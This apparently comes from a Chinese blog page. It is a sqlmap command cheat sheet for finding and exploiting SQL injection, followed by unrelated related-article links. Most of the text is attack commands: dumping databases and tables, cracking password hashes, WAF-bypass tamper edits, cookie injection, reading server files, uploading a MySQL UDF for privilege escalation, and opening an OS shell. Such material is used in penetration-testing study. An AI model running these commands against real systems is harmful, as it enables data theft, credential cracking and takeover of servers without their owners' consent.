sqlmap实战-1
sqlmap实战-1
检测和利用sql注入
python2 sqlmap.py -u "[URL_SQL注入点]" [--batch]
--batch
:自动选择sqlmap默认的选择
寻找目标
直接连接数据库
python2 sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]" --banner --dbs --users
数据库操作参数:
--dbs
:列举数据库信息
--current-db
:当前数据库名
--current-user
:当前数据库用户
--users
:列举DBMS中所有用户
--passwords
:列举DBMA中所有账户和密码
-D [databases] …
:指定数据库名,对库进行操作
-T [tables]
:指定数据表,对表进行操作
-C [columns]
:指定列名,对列进行操作
--tables
:列举数据库表的信息
--columns
:列举数据表的列名信息
--schema
:枚举数据库结构
--count
:枚举数据包的项目数
-D/-T/-C/--dbs/--tables/--columns/--schema/--count
联合操作就可以实现对数据库的具体操作
#列举库中的所有表:
-D [库名] --tables
#列举表中的字段名:
-D [库名] -T [表名] --columns
--dump
:导出数据
--start
:指定开始的行
--stop
:指定结束的行
# 导出当前全部的数据表数据
-D [库名] -T [表名] -C [字段名] --count --dump
# 导出部分(范围)数据表数据
-D [库名] -T [表名] -C [字段名] --start {*} --stop {*} --dump
sqlmap技巧
利用注释的方法绕过waf注入
/tamper/halfversionecdmoreckeywords.py:
return match.group().replace(word, "/*!0%s" % word)
# 修改
return match.group().replace(word,"/*!50000%s*/" % word)
/xml/queries.xml:
<cast query="CAST(%s AS CHAR)"/>
<!--修改-->
<cast query="CAST(%s, CHAR)"/>
sqlmap实施注入:
sqlmap.py -u [url] --tamper ./tamper/halfversionecdmoreckeywords.py
sqlmap.py -u [url] --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py
URL重写SQL注入测试
value1
为测试参数,加*符号即可,sqlmap将会测试value1
位置是否可以注入
列举并破解密码hash
当用户可以有权限查看用户密码的时候,--password
会自动连接并破解hash返回结果
对目标进行爬取
--batch --crawl=3
从目标URL爬取网站
使用hex规避编码导致丢失
sqlmap.py -u [url] --banner --hex -v 3 --parse-errors
--parse-errors
:解析和显示响应数据库错误信息
模仿移动端访问目标
sqlmap.py -u [url] --banner --mobile
--mobile
:设定一个移动端的“User-Agent”模仿手机访问URL
智能判断测试
sqlmap.py -u [url] --bath --smart
--smart
:快速判断 为报错注入点进行注入
结合Burp进行注入测试
在Burp——Options——"proxy.Requests"中保存Burp的抓包记录
sqlmap.py -r burp***.txt
从抓包记录中加载HTTP请求
sqlmap.py -u [url] --data "[*……*]"
自动填写表单
sqlmap.py -u [url] --forms [……]
--forms
:解析和测试目标URL表单
读取Linux的文件
sqlmap.py -u [url] --file [url]
延时注入
sqlmap.py -u [url] --technique -T --current-user
sqlmap.py -u [url] --delay 0.5
sqlmap.py -u [url] --safe-freq # 请求两次
Burp抓包利用sqlmap注入
sqlmap.py -r ***.txt -p [需要注入的参数]
-p
:指定注入参数
sqlmap Cookies注入
默认情况下,sqlmap只支持get/post参数的注入,使用-level
参数且数值大于等于2就会检测cookie参数,大概大于3时检查User-Agent和Referer
sqlmap.py -u [url] --cookie [value] --level 3
sqlmap.py -u [url] --cookie [value] --level 3 --tables
sqlmap.py -u [url] --cookie [value] --level 3 -T [表名] --coiumns
……
MySQL提权
连接并打开一个交互shell
sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]" --sql-shell
上传lib_mysqludf_sys到plugin目录
sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]"
--file-write=
执行shell命令
sqlmap.py -u [url] --os-cmd=[^] #执行cmd命令(Win环境)
sqlmap.py -u [url] --os-shell=[^] #建立交互式的shell
sqlmap实战-1的更多相关文章
- sqlmap 实战漏洞平台dvwa进行密码破解
2016-05-24 (1)实验的具体的环境极其思路 首先我们要检测我们的漏洞平台是否有sql注入 ,进行简单的测试发现在用户userid 上存在注入的漏洞 使用抓包工具对其cookie 进行获取如下 ...
- kali安全工具
http://www.kali.org.cn/ Kali linux下载安装 (27) kali linux是backtrack的最新代号,或者叫新版本的backtrack,欢迎下载使用. 908 / ...
- Web安全工程师(进阶)课程表
01-SQL注入漏洞原理与利用 预备知识: 了解HTTP协议,了解常见的数据库.脚本语言.中间件.具备基本的编程语言基础. 授课大纲: 第一章:SQL注入基础 1.1 Web应用架构分析1.2 SQL ...
- Web安全攻防(简)学习笔记
Web安全攻防-学习笔记 本文属于一种总结性的学习笔记,内容许多都早先发布独立的文章,可以通过分类标签进行查看 信息收集 信息收集是渗透测试全过程的第一步,针对渗透目标进行最大程度的信息收集,遵随&q ...
- sqlmap注入工具----一次简单的注入(实战)
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受.上网找了好多详细教程,但是命令实在是太多 ...
- sqlmap+DWAV测试实战(一)
root@kali-yaming:~# sqlmap -u "http://172.18.225.39/vulnerabilities/sqli/?id=1&Submit=Submi ...
- 使用sqlmap对进行php+mysql注入实战
作者:陈小兵一般来讲一旦网站存在sql注入漏洞,通过sql注入漏洞轻者可以获取数据,严重的将获取webshell以及服务器权限,但在实际漏洞利用和测试过程中,也可能因为服务器配置等情况导致无法获取权限 ...
- 【实战】sqlmap显示有注入却无法爆出库名
sqlmap爆mssql数据库时采用的语句如下图: 从语句中不难看出,如果关键字select被“(非tamper绕过)处理”了,那sqlmap是无法爆出数据库的,这时我们可以使用原始的猜解法, #判断 ...
- sqlmap连接Mysql实现getshell(原创)
前言 昨天群友发了一知乎的帖子..才发现sqlmap玩了那么久有些玩意我居然没玩过...然后看着群友玩= =今天也想试试. 0x01 首先得知道这个玩意,sqlmap -help,不说大家也懂搜嘎. ...
随机推荐
- 新建项目中的fail和missing之类的问题
首先必须要明白:每一个项目需要都要安装在本地仓库中去--->pom,war,jar无一例外 如果不安装会出现下面的错误: 解决的办法就是: 先clean后install项目,把他们安装到本地仓库 ...
- MySQL Explain学习笔记
目录 一.执行计划概念 二.Explain用法 三.Explain属性介绍 3.1 id属性 3.2 select_type属性 3.3 table属性 3.4 type属性 3.5 possible ...
- FreeSql (十九)多表查询
多表查询,常用的有联表 LeftJoin/InnerJoin/RightJoin ,这三个方法在上篇文章已经介绍过. 除了联表,还有子查询 Where Exists,和 Select 子表: IFre ...
- 【第十三篇】mvc下载文件,包括配置xml保护服务端文件不被外链直接访问
这里先说下载文件 <a style="color:black; margin-right:3px;" onclick="dowAtt(' + index + ')& ...
- 「小技巧」使用Git从其他分支merge个别文件
小明发现在实际项目开发过程中,总会遇到各种各样的情况,比如一个大型的项目或版本迭代可能不是一次上线,可能会分好几次上线,这时候就会涉及创建多个分支,分别开发. 项目背景 产品经理:我们本次开发三个功能 ...
- ACM代码模板
功能介绍 写了I/O函数,支持以下几种方式 read(num); //读入一个数num(任意整数类型,下同) read(num1,num2,num3,num4); //读入任意多个数 read(arr ...
- Flask学习之旅--还是数据库(sqlacodegen + SQL Alchemy)
一.写在前面 其实之前已经写过一篇关于 Flask 中使用数据库的博客了,不过那一篇博客主要是记录我在使用 Flask + MySQL8.0 时所遇到的一些问题(如果用的不是 MySQL8.0估计就没 ...
- charles 访问控制设置
本文参考:charles 访问控制设置 charles 访问控制设置 access control settings 访问账户设置: 这里可以配置连接到charles时的一些配置: 这个访问控制确定谁 ...
- HTML-css样式引用方式
1.使用行内样式表 语法:在标签内部写入一个style属性. 优点:没有样式表文件,在某些时候可以提高效率: 优先级高. 缺点:多个页面难以共享样式,不利于代码复用: HTML和CSS代码混杂,不利于 ...
- [MySQL] 02- Optimisation solutions
前言 一.资源 MySQL 对于千万级的大表要怎么优化? - MySQL - 知乎[方法论] MySQL大表优化方案[一些优化的细节操作] MySQL大表优化方案[一些优化的细节操作] 分布式数据库下 ...